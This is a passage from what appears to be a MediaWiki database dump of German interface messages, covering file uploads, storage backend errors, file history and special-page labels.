vorgegebene Dateiname und daher nicht sehr aussagekräftig.\nBitte gib der Datei einen Namen, der den Inhalt besser beschreibt.\";'),('de','messages:filename-prefix-blacklist','s:470:\" #
                                                                \n#  Syntax:\n#   * Alles von einem #-Zeichen bis zum Ende der Zeile ist ein Kommentar.\n#   * Jede nicht-leere Zeile ist der Anfang eines typischen Dateinamens, der automatisch von einer Digitalkamera erzeugt wird.\nCIMG # Casio\nDSC_ # Nikon\nDSCF # Fuji\nDSCN # Nikon\nDUW # einige Mobiltelefone\nIMG # allgemein\nJD # Jenoptik\nMGP # Pentax\nPICT # verschiedene\n #
                                                                \";'),('de','messages:upload-success-subj','s:23:\"Erfolgreich hochgeladen\";'),('de','messages:upload-success-msg','s:84:\"Das Hochladen von [$2] war erfolgreich. Sie ist hier verfügbar: [[:{{ns:file}}:$1]]\";'),('de','messages:upload-failure-subj','s:14:\"Hochladefehler\";'),('de','messages:upload-failure-msg','s:63:\"Es gab ein Problem mit deiner hochgeladenen Datei von [$2]:\n\n$1\";'),('de','messages:upload-warning-subj','s:15:\"Hochladewarnung\";'),('de','messages:upload-warning-msg','s:143:\"Es gab ein Problem beim Hochladen von [$2]. Bitte zum [[Special:Upload/stash/$1|Hochladeformular]] zurückkehren, um dieses Problem zu beheben.\";'),('de','messages:upload-proto-error','s:18:\"Falsches Protokoll\";'),('de','messages:upload-proto-error-text','s:72:\"Die URL muss mit http:// oder ftp:// beginnen.\";'),('de','messages:upload-file-error','s:15:\"Interner Fehler\";'),('de','messages:upload-file-error-text','s:160:\"Bei der Erstellung einer temporären Datei auf dem Server ist ein interner Fehler aufgetreten.\nBitte informiere einen [[Special:ListUsers/sysop|Administrator]].\";'),('de','messages:upload-misc-error','s:33:\"Unbekannter Fehler beim Hochladen\";'),('de','messages:upload-misc-error-text','s:226:\"Beim Hochladen ist ein unbekannter Fehler aufgetreten.\nPrüfe die URL auf Fehler, den Online-Status der Seite und versuche es erneut.\nWenn das Problem weiter besteht, informiere einen [[Special:ListUsers/sysop|Administrator]].\";'),('de','messages:upload-too-many-redirects','s:44:\"Die URL beinhaltete zu viele Weiterleitungen\";'),('de','messages:upload-http-error','s:35:\"Ein HTTP-Fehler ist aufgetreten: $1\";'),('de','messages:upload-copy-upload-invalid-domain','s:71:\"Als Kopie hochladbare Dateien sind über diese Domain nicht verfügbar.\";'),('de','messages:backend-fail-stream','s:45:\"Die Datei $1 konnte nicht übertragen werden.\";'),('de','messages:backend-fail-backup','s:43:\"Die Datei $1 konnte nicht gesichert werden.\";'),('de','messages:backend-fail-notexists','s:33:\"Die Datei $1 ist nicht vorhanden.\";'),('de','messages:backend-fail-hashes','s:72:\"Die Streuwerte der Datei konnten nicht zum Vergleichen abgerufen werden.\";'),('de','messages:backend-fail-notsame','s:64:\"Es ist bereits eine Datei $1 vorhanden, die nicht identisch ist.\";'),('de','messages:backend-fail-invalidpath','s:41:\"$1 ist kein gültiger Pfad zum Speichern.\";'),('de','messages:backend-fail-delete','s:43:\"Die Datei $1 konnte nicht gelöscht werden.\";'),('de','messages:backend-fail-describe','s:69:\"Die Metadaten für die Datei „$1“ konnten nicht geändert werden.\";'),('de','messages:backend-fail-alreadyexists','s:34:\"Die Seite $1 ist bereits vorhanden\";'),('de','messages:backend-fail-store','s:54:\"Die Datei $1 konnte nicht unter $2 gespeichert werden.\";'),('de','messages:backend-fail-copy','s:49:\"Die Datei $1 konnte nicht nach $2 kopiert werden.\";'),('de','messages:backend-fail-move','s:52:\"Die Datei $1 konnte nicht nach $2 verschoben werden.\";'),('de','messages:backend-fail-opentemp','s:51:\"Die temporäre Datei konnte nicht geöffnet werden.\";'),('de','messages:backend-fail-writetemp','s:53:\"Die temporäre Datei konnte nicht geschrieben werden.\";'),('de','messages:backend-fail-closetemp','s:53:\"Die temporäre Datei konnte nicht geschlossen werden.\";'),('de','messages:backend-fail-read','s:41:\"Die Datei $1 konnte nicht gelesen werden.\";'),('de','messages:backend-fail-create','s:45:\"Die Datei $1 konnte nicht gespeichert werden.\";'),('de','messages:backend-fail-maxsize','s:102:\"Die Datei $1 konnte nicht gespeichert werden, da sie größer als {{PLURAL:$2|ein Byte|$2 Bytes}} ist.\";'),('de','messages:backend-fail-readonly','s:103:\"Das Speicher-Backend „$1“ befindet sich derzeit im Lesemodus. Der angegebene Grund lautet: „$2“\";'),('de','messages:backend-fail-synced','s:108:\"Die Datei „$1“ befindet sich, innerhalb des internen Speicher-Backends, in einem inkonsistenten Zustand.\";'),('de','messages:backend-fail-connect','s:76:\"Es konnte keine Verbindung zum Speicher-Backend „$1“ hergestellt werden.\";'),('de','messages:backend-fail-internal','s:68:\"Im Speicher-Backend „$1“ ist ein unbekannter Fehler aufgetreten.\";'),('de','messages:backend-fail-contenttype','s:89:\"Der Inhaltstyp, der im Pfad „$1“ zu speichernden Datei, konnte nicht bestimmt werden.\";'),('de','messages:backend-fail-batchsize','s:209:\"Eine Stapelverarbeitungsdatei, die {{PLURAL:$1|eine Operation|$1 Operationen}} enthält, wurde an das Speicher-Backend gesandt. Die Begrenzung liegt allerdings bei {{PLURAL:$2|einer Operation|$2 Operationen}}.\";'),('de','messages:backend-fail-usable','s:164:\"Die Datei „$1“ konnte entweder aufgrund eines nicht vorhandenen Verzeichnisses oder wegen unzureichender Berechtigungen weder abgerufen noch gespeichert werden.\";'),('de','messages:filejournal-fail-dbconnect','s:98:\"Es konnte keine Verbindung zur Journaldatenbank des Speicher-Backends „$1“ hergestellt werden.\";'),('de','messages:filejournal-fail-dbquery','s:85:\"Die Journaldatenbank des Speicher-Backends „$1“ konnte nicht aktualisiert werden.\";'),('de','messages:lockmanager-notlocked','s:66:\"„$1“ konnte nicht entsperrt werden, da keine Sperrung besteht.\";'),('de','messages:lockmanager-fail-closelock','s:61:\"Die Sperrdatei für „$1“ konnte nicht geschlossen werden.\";'),('de','messages:lockmanager-fail-deletelock','s:59:\"Die Sperrdatei für „$1“ konnte nicht gelöscht werden.\";'),('de','messages:lockmanager-fail-acquirelock','s:55:\"Die Sperre für „$1“ konnte nicht abgerufen werden.\";'),('de','messages:lockmanager-fail-openlock','s:59:\"Die Sperrdatei für „$1“ konnte nicht geöffnet werden.\";'),('de','messages:lockmanager-fail-releaselock','s:57:\"Die Sperre für „$1“ konnte nicht freigegeben werden.\";'),('de','messages:lockmanager-fail-db-bucket','s:110:\"Es konnte mit Sammelabruf $1 keine ausreichende Anzahl an Verbindungen zu Sperrdatenbanken hergestellt werden.\";'),('de','messages:lockmanager-fail-db-release','s:62:\"Die Sperren auf Datenbank $1 konnten nicht freigegeben werden.\";'),('de','messages:lockmanager-fail-svr-acquire','s:56:\"Die Sperren auf Server $1 konnte nicht abgerufen werden.\";'),('de','messages:lockmanager-fail-svr-release','s:59:\"Die Sperren auf Server $1 konnten nicht freigegeben werden.\";'),('de','messages:zip-file-open-error','s:75:\"Es ist ein Fehler beim Öffnen der Datei zur ZIP-Überprüfung aufgetreten.\";'),('de','messages:zip-wrong-format','s:41:\"Die angegebene Datei ist keine ZIP-Datei.\";'),('de','messages:zip-bad','s:171:\"Die Datei ist beschädigt oder eine aus anderweitigen Gründen nicht lesbare ZIP-Datei.\nSie kann daher keiner ordnungsgemäßen Sicherheitsüberprüfung unterzogen werden.\";'),('de','messages:zip-unsupported','s:188:\"Diese ZIP-Datei verfügt über Komprimierungseigenschaften, die nicht von MediaWiki unterstützt werden.\nSie kann daher keiner ordnungsgemäßen Sicherheitsüberprüfung unterzogen werden.\";'),('de','messages:uploadstash','s:31:\"Vorabspeicherung beim Hochladen\";'),('de','messages:uploadstash-summary','s:227:\"Diese Seite ermöglicht den Zugriff auf Dateien, die hochgeladen wurden, bzw. gerade hochgeladen werden, aber noch nicht auf dem Wiki publiziert wurden. Die Dateien sind ausschließlich für den hochladenden Benutzer einsehbar.\";'),('de','messages:uploadstash-clear','s:41:\"Die vorab gespeicherten Dateien entfernen\";'),('de','messages:uploadstash-nofiles','s:52:\"Es sind keine vorab gespeicherten Dateien vorhanden.\";'),('de','messages:uploadstash-badtoken','s:139:\"Das Entfernen der vorab gespeicherten Dateien war erfolglos, vielleicht weil deine Sitzungsdaten abgelaufen sind. Bitte versuche es erneut.\";'),('de','messages:uploadstash-errclear','s:60:\"Das Entfernen der vorab gespeicherten Dateien war erfolglos.\";'),('de','messages:uploadstash-refresh','s:31:\"Liste der Dateien aktualisieren\";'),('de','messages:invalid-chunk-offset','s:22:\"Ungültiger Startpunkt\";'),('de','messages:img-auth-accessdenied','s:18:\"Zugriff verweigert\";'),('de','messages:img-auth-nopathinfo','s:321:\"Die Angabe PATH_INFO fehlt.\nDer Server ist nicht dafür eingerichtet, diese Information weiterzugeben.\nSie könnte CGI-gestützt sein und kann daher „img_auth“ (Authentifizierung des Dateiaufrufs) nicht unterstützen.\nSiehe auch https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:Image_Authorization (englisch).\";'),('de','messages:img-auth-notindir','s:67:\"Der gewünschte Pfad ist nicht im konfigurierten Uploadverzeichnis.\";'),('de','messages:img-auth-badtitle','s:55:\"Aus „$1“ kann kein gültiger Titel erstellt werden.\";'),('de','messages:img-auth-nologinnWL','s:69:\"Du bist nicht angemeldet und „$1“ ist nicht in der weißen Liste.\";'),('de','messages:img-auth-nofile','s:31:\"Datei „$1“ existiert nicht.\";'),('de','messages:img-auth-isdir','s:85:\"Du versuchst, auf ein Verzeichnis „$1“ zuzugreifen.\nNur Dateizugriff ist erlaubt.\";'),('de','messages:img-auth-streaming','s:14:\"Lade „$1“.\";'),('de','messages:img-auth-public','s:167:\"img_auth.php gibt Dateien von einem privaten Wiki aus.\nDieses Wiki wurde als ein öffentliches Wiki konfiguriert.\nAus Sicherheitsgründen ist img_auth.php deaktiviert.\";'),('de','messages:img-auth-noread','s:51:\"Benutzer hat keine Berechtigung, „$1“ zu lesen.\";'),('de','messages:http-invalid-url','s:18:\"Ungültige URL: $1\";'),('de','messages:http-invalid-scheme','s:54:\"URLs mit dem Schema „$1“ werden nicht unterstützt\";'),('de','messages:http-request-error','s:31:\"Fehler beim Senden der Anfrage.\";'),('de','messages:http-read-error','s:16:\"HTTP-Lesefehler.\";'),('de','messages:http-timed-out','s:41:\"Zeitüberschreitung bei der HTTP-Anfrage.\";'),('de','messages:http-curl-error','s:29:\"Fehler beim Abruf der URL: $1\";'),('de','messages:http-bad-status','s:59:\"Während der HTTP-Anfrage ist ein Fehler aufgetreten: $1 $2\";'),('de','messages:upload-curl-error6','s:24:\"URL ist nicht erreichbar\";'),('de','messages:upload-curl-error6-text','s:111:\"Die angegebene URL ist nicht erreichbar. Prüfe sowohl die URL auf Fehler als auch den Online-Status der Seite.\";'),('de','messages:upload-curl-error28','s:34:\"Zeitüberschreitung beim Hochladen\";'),('de','messages:upload-curl-error28-text','s:206:\"Die Seite braucht zu lange, um zu antworten. Prüfe, ob die Seite online ist, warte einen kurzen Moment und versuche es dann erneut. Es kann sinnvoll sein, es zu einem anderen Zeitpunkt erneut zu versuchen.\";'),('de','messages:license','s:7:\"Lizenz:\";'),('de','messages:license-header','s:6:\"Lizenz\";'),('de','messages:nolicense','s:16:\"Keine Vorauswahl\";'),('de','messages:licenses-edit','s:25:\"Lizenzoptionen bearbeiten\";'),('de','messages:license-nopreview','s:34:\"(es ist keine Vorschau verfügbar)\";'),('de','messages:upload_source_url','s:77:\"(deine ausgewählte Datei von einer gültigen, öffentlich zugänglichen URL)\";'),('de','messages:upload_source_file','s:46:\"(deine ausgewählte Datei von deinem Computer)\";'),('de','messages:listfiles-delete','s:8:\"löschen\";'),('de','messages:listfiles-summary','s:57:\"Diese Spezialseite listet alle hochgeladenen Dateien auf.\";'),('de','messages:listfiles_search_for','s:17:\"Suche nach Datei:\";'),('de','messages:imgfile','s:5:\"Datei\";'),('de','messages:listfiles','s:10:\"Dateiliste\";'),('de','messages:listfiles_thumb','s:12:\"Vorschaubild\";'),('de','messages:listfiles_date','s:5:\"Datum\";'),('de','messages:listfiles_name','s:4:\"Name\";'),('de','messages:listfiles_user','s:8:\"Benutzer\";'),('de','messages:listfiles_size','s:7:\"Größe\";'),('de','messages:listfiles_description','s:12:\"Beschreibung\";'),('de','messages:listfiles_count','s:9:\"Versionen\";'),('de','messages:listfiles-show-all','s:32:\"Alte Bildversionen einschließen\";'),('de','messages:listfiles-latestversion','s:16:\"Aktuelle Version\";'),('de','messages:listfiles-latestversion-yes','s:2:\"Ja\";'),('de','messages:listfiles-latestversion-no','s:4:\"Nein\";'),('de','messages:file-anchor-link','s:5:\"Datei\";'),('de','messages:filehist','s:14:\"Dateiversionen\";'),('de','messages:filehist-help','s:54:\"Klicke auf einen Zeitpunkt, um diese Version zu laden.\";'),('de','messages:filehist-deleteall','s:23:\"Alle Versionen löschen\";'),('de','messages:filehist-deleteone','s:22:\"Diese Version löschen\";'),('de','messages:filehist-revert','s:13:\"zurücksetzen\";'),('de','messages:filehist-current','s:7:\"aktuell\";'),('de','messages:filehist-datetime','s:11:\"Version vom\";'),('de','messages:filehist-thumb','s:12:\"Vorschaubild\";'),('de','messages:filehist-thumbtext','s:39:\"Vorschaubild der Version vom $2, $3 Uhr\";'),('de','messages:filehist-nothumb','s:27:\"Kein Vorschaubild vorhanden\";'),('de','messages:filehist-user','s:8:\"Benutzer\";'),('de','messages:filehist-dimensions','s:5:\"Maße\";'),('de','messages:filehist-filesize','s:12:\"Dateigröße\";'),('de','messages:filehist-comment','s:9:\"Kommentar\";'),('de','messages:imagelinks','s:15:\"Dateiverwendung\";'),('de','messages:linkstoimage','s:85:\"Die {{PLURAL:$1|folgende Seite verwendet|folgenden $1 Seiten verwenden}} diese Datei:\";'),('de','messages:linkstoimage-more','s:245:\"Mehr als {{PLURAL:$1|eine Seite verlinkt|$1 Seiten verlinken}} auf diese Datei.\nDie folgende Liste zeigt nur {{PLURAL:$1|den ersten Link|die ersten $1 Links}} auf diese Datei.\nEine [[Special:WhatLinksHere/$2|vollständige Liste]] ist verfügbar.\";'),('de','messages:nolinkstoimage','s:32:\"Keine Seite benutzt diese Datei.\";'),('de','messages:morelinkstoimage','s:59:\"[[Special:WhatLinksHere/$1|Weitere Links]] auf diese Datei.\";'),('de','messages:linkstoimage-redirect','s:26:\"$1 (Dateiweiterleitung) $2\";'),('de','messages:duplicatesoffile','s:152:\"Die {{PLURAL:$1|folgende Datei ist ein Duplikat|folgenden $1 Dateien sind Duplikate}} dieser Datei ([[Special:FileDuplicateSearch/$2|weitere Details]]):\";'),('de','messages:sharedupload','s:74:\"Diese Datei stammt aus $1 und darf von anderen Projekten verwendet werden.\";'),('de','messages:sharedupload-desc-there','s:146:\"Diese Datei stammt aus $1 und darf von anderen Projekten verwendet werden. Siehe auf der [$2 Dateibeschreibungsseite] nach weiteren Informationen.\";'),('de','messages:sharedupload-desc-here','s:152:\"Diese Datei stammt aus $1 und kann von anderen Projekten verwendet werden. Die Beschreibung von deren [$2 Dateibeschreibungsseite] wird unten angezeigt.\";'),('de','messages:sharedupload-desc-edit','s:173:\"Diese Datei stammt aus $1 und kann auf anderen Projekten verwendet werden.\nVielleicht möchtest du die Beschreibung auf der dortigen [$2 Dateibeschreibungsseite] bearbeiten.\";'),('de','messages:sharedupload-desc-create','s:173:\"Diese Datei stammt aus $1 und kann von anderen Projekten verwendet werden.\nVielleicht möchtest du die Beschreibung auf der dortigen [$2 Dateibeschreibungsseite] bearbeiten.\";'),('de','messages:filepage-nofile','s:43:\"Es ist keine Datei dieses Namens vorhanden.\";'),('de','messages:filepage-nofile-link','s:88:\"Es ist keine Datei dieses Namens vorhanden. Du kannst jedoch [$1 diese Datei hochladen].\";'),('de','messages:uploadnewversion-linktext','s:40:\"Eine neue Version dieser Datei hochladen\";'),('de','messages:shared-repo-from','s:6:\"aus $1\";'),('de','messages:shared-repo','s:38:\"einem gemeinsam genutzten Medienarchiv\";'),('de','messages:filepage.css','s:97:\"/* Das folgende CSS wird auf Dateibeschreibungsseiten, auch auf fremden Client-Wikis, geladen. */\";'),('de','messages:upload-disallowed-here','s:43:\"Du kannst diese Datei nicht überschreiben.\";'),('de','messages:filerevert','s:26:\"Zurücksetzen von „$1“\";'),('de','messages:filerevert-legend','s:19:\"Datei zurücksetzen\";'),('de','messages:filerevert-intro','s:85:\"Du setzt die Datei \'\'\'[[Media:$1|$1]]\'\'\' auf die [$4 Version vom $2, $3 Uhr] zurück.\";'),('de','messages:filerevert-comment','s:6:\"Grund:\";'),('de','messages:filerevert-defaultcomment','s:45:\"Zurückgesetzt auf die Version vom $1, $2 Uhr\";'),('de','messages:filerevert-submit','s:13:\"Zurücksetzen\";'),('de','messages:filerevert-success','s:79:\"\'\'\'[[Media:$1|$1]]\'\'\' wurde auf die [$4 Version vom $2, $3 Uhr] zurückgesetzt.\";'),('de','messages:filerevert-badversion','s:61:\"Es gibt keine Version der Datei zu dem angegebenen Zeitpunkt.\";'),('de','messages:filedelete','s:16:\"Lösche „$1“\";'),('de','messages:filedelete-legend','s:13:\"Lösche Datei\";'),('de','messages:filedelete-intro','s:85:\"Du löschst die Datei \'\'\'„[[Media:$1|$1]]“\'\'\' inklusive ihrer Versionsgeschichte.\";'),('de','messages:filedelete-intro-old','s:86:\"Du löschst von der Datei \'\'\'„[[Media:$1|$1]]“\'\'\' die [$4 Version vom $2, $3 Uhr].\";'),('de','messages:filedelete-comment','s:6:\"Grund:\";'),('de','messages:filedelete-submit','s:8:\"Löschen\";'),('de','messages:filedelete-success','s:31:\"\'\'\'„$1“\'\'\' wurde gelöscht.\";'),('de','messages:filedelete-success-old','s:85:\"Von der Datei \'\'\'„[[Media:$1|$1]]“\'\'\' wurde die Version vom $2, $3 Uhr gelöscht.\";'),('de','messages:filedelete-nofile','s:35:\"\'\'\'„$1“\'\'\' ist nicht vorhanden.\";'),('de','messages:filedelete-nofile-old','s:84:\"Es gibt von \'\'\'„$1“\'\'\' keine archivierte Version mit den angegebenen Attributen.\";'),('de','messages:filedelete-otherreason','s:27:\"Anderer/ergänzender Grund:\";'),('de','messages:filedelete-reason-otherlist','s:13:\"Anderer Grund\";'),('de','messages:filedelete-reason-dropdown','s:65:\"* Allgemeine Löschgründe\n** Urheberrechtsverletzung\n** Duplikat\";'),('de','messages:filedelete-edit-reasonlist','s:24:\"Löschgründe bearbeiten\";'),('de','messages:filedelete-maintenance','s:107:\"Das Löschen und Wiederherstellen von Dateien ist aufgrund von Wartungsarbeiten vorübergehend deaktiviert.\";'),('de','messages:filedelete-maintenance-title','s:38:\"Die Datei kann nicht gelöscht werden.\";'),('de','messages:mimesearch','s:19:\"Suche nach MIME-Typ\";'),('de','messages:mimesearch-summary','s:220:\"Auf dieser Spezialseite können die Dateien nach dem MIME-Typ gefiltert werden.\nDie Eingabe muss immer den Medien- und Subtyp beinhalten: image/jpeg oder image/* (siehe Dateibeschreibungsseite).\";'),('de','messages:mimetype','s:9:\"MIME-Typ:\";'),('de','messages:download','s:13:\"Herunterladen\";'),('de','messages:unwatchedpages','s:24:\"Nicht beobachtete Seiten\";'),('de','messages:listredirects','s:15:\"Weiterleitungen\";'),('de','messages:listduplicatedfiles','s:32:\"Liste der Dateien mit Duplikaten\";'),('de','messages:listduplicatedfiles-summary','s:166:\"Dies ist eine Liste der Dateien, deren aktuelle Dateiversion ein Duplikat der aktuellen Version einer anderen Datei ist. Es werden nur lokale Dateien berücksichtigt.\";'),('de','messages:listduplicatedfiles-entry','s:67:\"[[:File:$1|$1]] hat [[$3|{{PLURAL:$2|ein Duplikat|$2 Duplikate}}]].\";'),('de','messages:unusedtemplates','s:18:\"Verwaiste Vorlagen\";'),('de','messages:unusedtemplatestext','s:177:\"Diese Seite listet alle Seiten im {{ns:template}}-Namensraum auf, die nicht in anderen Seiten eingebunden sind.\nÜberprüfe andere Links zu den Vorlagen, bevor du diese löscht.\";'),('de','messages:unusedtemplateswlh','s:12:\"Andere Links\";'),('de','messages:randompage','s:16:\"Zufällige Seite\";'),('de','messages:randompage-nopages','s:109:\"Es sind keine Seiten {{PLURAL:$2|im folgenden Namensraum|in den folgenden Namensräumen}} enthalten: „$1“\";'),('de','messages:randomincategory','s:32:\"Zufällige Seite einer Kategorie\";'),('de','messages:randomincategory-invalidcategory','s:43:\"„$1“ ist kein gültiger Kategorienname.\";'),('de','messages:randomincategory-nopages','s:41:\"Es gibt keine Seiten in [[:Category:$1]].\";'),('de','messages:randomincategory-category','s:10:\"Kategorie:\";'),('de','messages:randomincategory-legend','s:29:\"Zufällige Seite in Kategorie\";'),('de','messages:randomredirect','s:24:\"Zufällige Weiterleitung\";'),('de','messages:randomredirect-nopages','s:60:\"Im Namensraum „$1“ sind keine Weiterleitungen vorhanden.\";'),('de','messages:statistics','s:9:\"Statistik\";'),('de','messages:statistics-header-pages','s:15:\"Seitenstatistik\";'),('de','messages:statistics-header-edits','s:21:\"Bearbeitungsstatistik\";'),('de','messages:statistics-header-views','s:21:\"Seitenaufrufstatistik\";'),('de','messages:statistics-header-users','s:17:\"Benutzerstatistik\";'),('de','messages:statistics-header-hooks','s:18:\"Andere Statistiken\";'),('de','messages:statistics-articles','s:13:\"Inhaltsseiten\";'),('de','messages:statistics-pages','s:6:\"Seiten\";'),('de','messages:statistics-pages-desc','s:77:\"Alle Seiten in diesem Wiki, inklusive Diskussionsseiten, Weiterleitungen usw.\";'),('de','messages:statistics-files','s:20:\"Hochgeladene Dateien\";'),('de','messages:statistics-edits','s:19:\"Seitenbearbeitungen\";'),('de','messages:statistics-edits-average','s:39:\"Bearbeitungen pro Seite im Durchschnitt\";'),('de','messages:statistics-views-total','s:20:\"Seitenaufrufe gesamt\";'),('de','messages:statistics-views-total-desc','s:84:\"Aufrufe nicht vorhandener Seiten und von Spezialseiten werden nicht berücksichtigt.\";'),('de','messages:statistics-views-peredit','s:29:\"Seitenaufrufe pro Bearbeitung\";'),('de','messages:statistics-users','s:43:\"Registrierte [[Special:ListUsers|Benutzer]]\";'),('de','messages:statistics-users-active','s:15:\"Aktive Benutzer\";'),('de','messages:statistics-users-active-desc','s:105:\"Benutzer mit Bearbeitungen {{PLURAL:$1|während der letzten 24 Stunden|während der vergangenen $1 Tage}}\";'),('de','messages:statistics-mostpopular','s:20:\"Meistbesuchte Seiten\";'),('de','messages:pageswithprop','s:34:\"Seiten mit einer Seiteneigenschaft\";'),('de','messages:pageswithprop-legend','s:34:\"Seiten mit einer Seiteneigenschaft\";'),('de','messages:pageswithprop-text','s:85:\"Diese Spezialseite listet Seiten auf, die eine bestimmte Seiteneigenschaft verwenden.\";'),('de','messages:pageswithprop-prop','s:17:\"Eigenschaftsname:\";'),('de','messages:pageswithprop-submit','s:3:\"Los\";'),('de','messages:pageswithprop-prophidden-long','s:39:\"Langtexteigenschaftswert versteckt ($1)\";'),('de','messages:pageswithprop-prophidden-binary','s:37:\"Binäreigenschaftswert versteckt ($1)\";'),('de','messages:doubleredirects','s:24:\"Doppelte Weiterleitungen\";'),('de','messages:doubleredirectstext','s:365:\"Diese Liste enthält Weiterleitungen, die auf Weiterleitungen verlinken.\nJede Zeile enthält Links zur ersten und zweiten Weiterleitung sowie dem Ziel der zweiten Weiterleitung, welches für gewöhnlich die gewünschte Zielseite ist, auf die bereits die erste Weiterleitung zeigen sollte.\nDurchgestrichene Einträge wurden bereits erfolgreich bearbeitet.\";'),('de','messages:double-redirect-fixed-move','s:100:\"[[$1]] wurde verschoben.\nDie Seite wurde automatisch aktualisiert und leitet nun nach [[$2]] weiter.\";'),('de','messages:double-redirect-fixed-maintenance','s:101:\"Automatische Bereinigung der doppelten Weiterleitung von [[$1]] nach [[$2]] in einem Wartungsauftrag.\";'),('de','messages:double-redirect-fixer','s:11:\"RedirectBot\";'),('de','messages:brokenredirects','s:23:\"Defekte Weiterleitungen\";'),('de','messages:brokenredirectstext','s:76:\"Diese Spezialseite listet Weiterleitungen auf nicht existierende Seiten auf.\";'),('de','messages:brokenredirects-edit','s:10:\"bearbeiten\";'),('de','messages:brokenredirects-delete','s:8:\"löschen\";'),('de','messages:withoutinterwiki','s:44:\"Nicht zu anderen Sprachen verlinkende Seiten\";'),('de','messages:withoutinterwiki-summary','s:64:\"Die folgenden Seiten verlinken nicht auf andere Sprachversionen.\";'),('de','messages:withoutinterwiki-legend','s:7:\"Präfix\";'),('de','messages:withoutinterwiki-submit','s:5:\"Zeige\";'),('de','messages:fewestrevisions','s:34:\"Seiten mit den wenigsten Versionen\";'),('de','messages:nbytes','s:27:\"$1 {{PLURAL:$1|Byte|Bytes}}\";'),('de','messages:ncategories','s:37:\"$1 {{PLURAL:$1|Kategorie|Kategorien}}\";'),('de','messages:ninterwikis','s:49:\"{{PLURAL:$1|Ein Interwikilink|$1 Interwikilinks}}\";'),('de','messages:nlinks','s:29:\"{{PLURAL:$1|1 Link|$1 Links}}\";'),('de','messages:nmembers','s:36:\"{{PLURAL:$1|1 Eintrag|$1 Einträge}}\";'),('de','messages:nmemberschanged','s:47:\"$1 → {{PLURAL:$2|Ein Mitglied|$2 Mitglieder}}\";'),('de','messages:nrevisions','s:44:\"{{PLURAL:$1|1 Bearbeitung|$1 Bearbeitungen}}\";'),('de','messages:nviews','s:35:\"{{PLURAL:$1|1 Abfrage|$1 Abfragen}}\";'),('de','messages:nimagelinks','s:49:\"Verwendet auf {{PLURAL:$1|einer Seite|$1 Seiten}}\";'),('de','messages:ntransclusions','s:49:\"verwendet auf {{PLURAL:$1|einer Seite|$1 Seiten}}\";'),('de','messages:specialpage-empty','s:55:\"Es sind aktuell keine zutreffenden Einträge vorhanden.\";'),('de','messages:lonelypages','s:16:\"Verwaiste Seiten\";'),('de','messages:lonelypagestext','s:99:\"Die folgenden Seiten werden nicht eingebunden oder es wird nicht auf sie in {{SITENAME}} verwiesen.\";'),('de','messages:uncategorizedpages','s:27:\"Nicht kategorisierte Seiten\";'),('de','messages:uncategorizedcategories','s:31:\"Nicht kategorisierte Kategorien\";'),('de','messages:uncategorizedimages','s:28:\"Nicht kategorisierte Dateien\";'),('de','messages:uncategorizedtemplates','s:29:\"Nicht kategorisierte Vorlagen\";'),('de','messages:unusedcategories','s:20:\"Verwaiste Kategorien\";'),('de','messages:unusedimages','s:17:\"Verwaiste Dateien\";'),('de','messages:popularpages','s:18:\"Beliebteste Seiten\";'),('de','messages:wantedcategories','s:22:\"Gewünschte Kategorien\";'),('de','messages:wantedpages','s:18:\"Gewünschte Seiten\";'),('de','messages:wantedpages-badtitle','s:33:\"Ungültiger Titel im Ergebnis: $1\";'),('de','messages:wantedfiles','s:19:\"Gewünschte Dateien\";'),('de','messages:wantedfiletext-cat','s:296:\"Die folgenden Dateien werden verwendet, sind jedoch nicht vorhanden. Vorhandene Dateien aus fremden Repositorien können dennoch hier aufgelistet sein und werden durchgestrichen dargestellt. Zusätzlich werden Seiten, die nicht vorhandene Dateien enthalten, in die [[:$1]] eingeordnet.\";'),('de','messages:wantedfiletext-cat-noforeign','s:156:\"Die folgenden Dateien werden verwendet, sind jedoch nicht vorhanden. Zusätzlich werden Seiten auf [[:$1]] gelistet, die nicht vorhandene Dateien einbetten.\";'),('de','messages:wantedfiletext-nocat','s:201:\"Die folgenden Dateien werden verwendet, sind jedoch nicht vorhanden. Vorhandene Dateien aus fremden Repositorien können dennoch hier aufgelistet sein und werden durchgestrichen dargestellt.\";'),('de','messages:wantedfiletext-nocat-noforeign','s:68:\"Die folgenden Dateien werden verwendet, sind jedoch nicht vorhanden.\";'),('de','messages:wantedtemplates','s:20:\"Gewünschte Vorlagen\";'),('de','messages:mostlinked','s:28:\"Seiten mit den meisten Links\";'),('de','messages:mostlinkedcategories','s:24:\"Meistbenutzte Kategorien\";'),('de','messages:mostlinkedtemplates','s:24:\"Meisteingebundene Seiten\";'),('de','messages:mostcategories','s:33:\"Seiten mit den meisten Kategorien\";'),('de','messages:mostimages','s:21:\"Meistbenutzte Dateien\";'),('de','messages:mostinterwikis','s:37:\"Seiten mit den meisten Interwikilinks\";'),('de','messages:mostrevisions','s:32:\"Seiten mit den meisten Versionen\";'),('de','messages:prefixindex','s:25:\"Alle Seiten (mit Präfix)\";'),('de','messages:prefixindex-namespace','s:39:\"Alle Seiten mit Präfix (Namensraum $1)\";'),('de','messages:prefixindex-strip','s:32:\"Präfix in der Liste abschneiden\";'),('de','messages:shortpages','s:12:\"Kurze Seiten\";'),('de','messages:longpages','s:12:\"Lange Seiten\";'),('de','messages:deadendpages','s:24:\"Nicht verlinkende Seiten\";'),('de','messages:deadendpagestext','s:72:\"Die folgenden Seiten verweisen nicht auf andere Seiten von {{SITENAME}}.\";'),('de','messages:protectedpages','s:18:\"Geschützte Seiten\";'),('de','messages:protectedpages-indef','s:43:\"Nur unbeschränkt geschützte Seiten zeigen\";'),('de','messages:protectedpages-summary','s:191:\"Diese Seite listet vorhandene Seiten auf, die derzeit geschützt sind. Für eine Liste vor Erstellung geschützter Titel, siehe „[[{{#special:ProtectedTitles}}|{{int:protectedtitles}}]]“.\";'),('de','messages:protectedpages-cascade','s:29:\"Nur Seiten mit Kaskadenschutz\";'),('de','messages:protectedpages-noredirect','s:26:\"Weiterleitungen ausblenden\";'),('de','messages:protectedpagesempty','s:59:\"Aktuell sind keine Seiten mit diesen Parametern geschützt.\";'),('de','messages:protectedpages-timestamp','s:11:\"Zeitstempel\";'),('de','messages:protectedpages-page','s:5:\"Seite\";'),('de','messages:protectedpages-expiry','s:11:\"Gültig bis\";'),('de','messages:protectedpages-performer','s:14:\"Geschützt von\";'),('de','messages:protectedpages-params','s:15:\"Schutzparameter\";'),('de','messages:protectedpages-reason','s:5:\"Grund\";'),('de','messages:protectedpages-unknown-timestamp','s:9:\"Unbekannt\";'),('de','messages:protectedpages-unknown-performer','s:20:\"Unbekannter 